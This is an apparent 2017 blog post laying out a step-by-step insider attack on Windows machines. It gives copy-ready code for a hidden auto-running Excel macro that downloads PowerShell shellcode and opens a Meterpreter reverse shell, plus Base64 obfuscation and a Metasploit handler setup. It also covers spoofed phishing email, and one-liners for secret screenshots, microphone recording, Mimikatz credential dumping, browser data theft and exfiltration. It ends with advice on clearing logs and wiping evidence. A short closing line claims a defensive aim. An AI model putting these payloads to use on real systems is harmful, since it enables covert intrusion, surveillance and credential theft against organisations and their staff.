Technical Guide for Insider Cyber Attacks

Danger can be at home

Bank Security
Dec 20, 2017 · 8 min read

Attack Description

Possible Attack scenarios:

  • Insider employee who wants exfiltrate business data for reselling it
  • Competitor who wants another company to look rubbish
  • Consultant who wants sneak into the corporate network for malicious purposes
  • …for the glory

Attack scope:

  • Open a reverse shell on a target machine bypassing standard Anti-malware solutions using in-memory powershell scripts
  • In-memory powershell Remote command execution
  • Dump credentials, take screenshots, register audio, etc…

Possible Attack vectors:

  • Targeted Phishing email that delivers malicious document with embedded macro
  • Rubber Ducky with predefined autorun PS malicious scripts
  • Exchange files between insider and victim colleague
  • Any method that can execute code on the victim’s machine…

In this article i will use phishing email as an example.

STEP 1: Code writing

Create CMD command string to execute on target PC:

  • powershell.exe → run the PowerShell on victim machine (working also with user privileges)
  • IEX (New-Object Net.WebClient) → run a local Internet Explorer instance in order to bypass proxy authentication
  • DownloadString(‘https://HOSTING_SITE/Shellcode.ps1'); → download PS script from remote host
  • Invoke-Shellcode → invoke the script execution on local machine directly in memory in order to bypass the AV solutions
  • -Payload windows/meterpreter/reverse_https → set the payload that you want to use
  • -Lhost x.x.x.x → set attacker’s IP machine
  • -Lport 443 → set port where the victim machine will try to contact the attacker machine. Set the 443 in order to bypass internal FW.
  • -Force → declare “I know what I’m doing, and I’m sure I want to do this”

During this attack demonstration i downloaded the script directly from Powerspolit Github repository in order to avoid network detection (you can also expose the script directly on your Kali Linux in order to ensure the communication without exit on internet) . So the complete command that will be execute on victim machine is the following:

powershell.exe “IEX (New-ObjectNet.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force”

STEP 2: Malicious Macro Code writing

In this step you need to include the previous script into a VBA Macro Excel Document:

  • Sub Auto_Open() → Run a macro when Excel starts
  • Call Shell(“cmd.exe → Run local CMD
  • /c powershell.exe → Run command to launch PowerShell
  • -noexit → prevent the PowerShell console window from closing
  • “IEX (New-Object…” → Previously created commands
  • vbHide → Hide the Command Window when executing command
  • End Sub → Exit Statement

So the complete VBA macro that you need to insert into a Excel is the following:

Sub Auto_Open()

Call Shell(“cmd.exe /c powershell.exe -noexit “”IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force”””, vbHide)

End Sub

An example of the malicious excel:

Excel example with a fake encrypted table
VBA Macro code

Virus Total Detection at day 0:

Hybrid-analysis:

Any.Run Interactive Malware Analysis:

Despite this malware has a simple structure and the code clearly highlights his malicious behavior, the detection ratio at day 0 is very low. This highlights the first real security problem concerning all vendors that are focused only on signatures for their detection.

STEP 3: Simple Code Obfuscation (OPTIONAL)

You can encode the command text in simple ways:

Encoding powershell script in Base64:

$command=”IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force”
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
$encodedCommand >> output.txt

Example of encoded command to execute:

powershell -ExecutionPolicy Bypass -encodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAB[…]=

You can also protect the VBA script with a password in order to avoid first investigation detection:

Macro password protection

STEP 4: Configure KALI Linux

Because this is an insider attack you can configure a live Kali Linux or install it using a VM. The goal is to run the code on the victim machine without leaving traces of the attacking machine, so choose the method you prefer for it.

I suggest you to use a preconfigured Virtual Kali Linux that you can delete immediately when occur.

Following the easy msfconsole configuration steps:

msfconsole
use exploit/multi/handler/
set Payload windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
exploit

Starting msfconsole
set exploit multi handler with reverse https
exploit in order to start the HTTPS reverse handler

Remember that if you want to successfully complete this attack without detection event you must only use these specific commands. If you try to use for example InitialAutoRunScript “migrate -f” or other scripts the AVs could be detect them.

STEP 5: OSINT Reconnaissance (OPTIONAL)

If you know everything about your target you can skip this step.

In other cases like phishing attack you will have to find the most suitable victim to receive the email or understand something more about the target.

In this example i show you how you can use a public tool named hunter.io to perform reconnaissance phase. On github and on the internet there many different tools that can help you in this phase.

Kaspersky Domain example results via Hunter.io tool:

example purposes only
example purposes only
example purposes only

Link of the tool: https://hunter.io/search

STEP 6: Send Malicious Email via fake online mailer

In order to send the malicious email without configure a mail server and expose yourself unnecessarily, I suggest to use an online fake mailer. On the internet there are many possibilities that you can use. Here you can find some examples:

Online fake mailer examples

According to the mailer used, the antispam services (in base reputation or other indicators) will block or let the email pass. I advise you to do some tests before proceeding in order to find the ideal mailer for your target.

link to the most famous fake mailer: https://emkei.cz/

Creating phishing email:

example purposes only

STEP 7: Victim receives the email

Online Outlook mail visualization example:

example purposes only

STEP 8: Waiting

At this point you just have to wait until:

  • User clicks on “enable content”
  • Macro runs the malicious code silently
  • Session will be opened

Here we are:

STEP 9: Actions on objective

Following you can find some examples of malicious command execution on Windows machines. During last days I had the opportunity to test different enterprise and home antivirus solutions which, except one, have miserably failed to detect and block the following types of advanced in-memory attacks.

Subsequently, the same tests were performed using ATP (advanced threat protection) and EDR (endpoint detection and response) technologies of the various enterprise solutions. Thanks to these integrations it was possible to detect or block all or only some of described attacks.

Write me if you need more details…

…Let’s start with the attacks:

Obtain Windows shell:

Take screenshots at a regular interval and saves them to disk using in memory powershell script

powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-TimedScreenshot.ps1'); Get-TimedScreenshot -Path c:\windows\temp\ -Interval 30 -EndTime 18:00”

Following you can find the screenshot saved on specified folder:

Record audio from the microphone using Windows API and save the output to a file on disk

powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-MicrophoneAudio.ps1'); Get-MicrophoneAudio -Path c:\windows\temp\secret.wav -Length 10 -Alias “SECRET”

Dump Credentials using in-memory powershell scripts

Standard Mimikatz toolthat dump credentials without writing mimikatz binary to disk.

powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds”

Mimikatz needs to be granted administrative privileges on victim machine. If you don’t want to use privilege escalation mechanisms you can use other scripts like:

WCMDump: PowerShell script to dump Windows credentials from the Credential Manager

powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1'); Invoke-WCMDump”

Get Browser Data

Enumerates browser history and bookmarks for a Chrome, Internet Explorer, and/or Firefox browsers on Windows machines:

powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Get-BrowserData.ps1'); Get-BrowserData”

Data Exfiltration — Download files

After executing malicious commands and saving the different outputs on the victim filesystem, you can download them using simple command directly from meterpreter:

meterpreter > download <file name>

using this method is possibile to download sensitive data from victim machine like business documents or personal information.

STEP 10: Erase the traces

There are many tricks in order to delete tracks of this activity. Here a simple list:

  • Using clearev meterpreter command is it possible to clear the Application, System, and Security logs on a Windows system
  • Disconnect Kali Linux
  • Safe the output file on a encrypted USB
  • Delete the VM image from disk
  • Wipe physical disk

Conclusion

PowerShell allows attackers to perform malicious actions without deploying any additional binary files, increasing the chances of spreading their threats further without being detected. The fact that PowerShell is installed by default makes the framework a favored attack tool.

With this attacks I showed you how is simple to compromise a machine and bypass the standard security measures that are normally used in large companies. I hope this demonstration can help all security vendors to increase their detection capabilities and all companies to realize that the “standard” security solutions used to date are not enough to detect these advanced attacks.

Could next-generation AVs be the solution? Surely it’s a way that must be evaluated!

Follow me on Twitter:

Github Repository used for this attacks: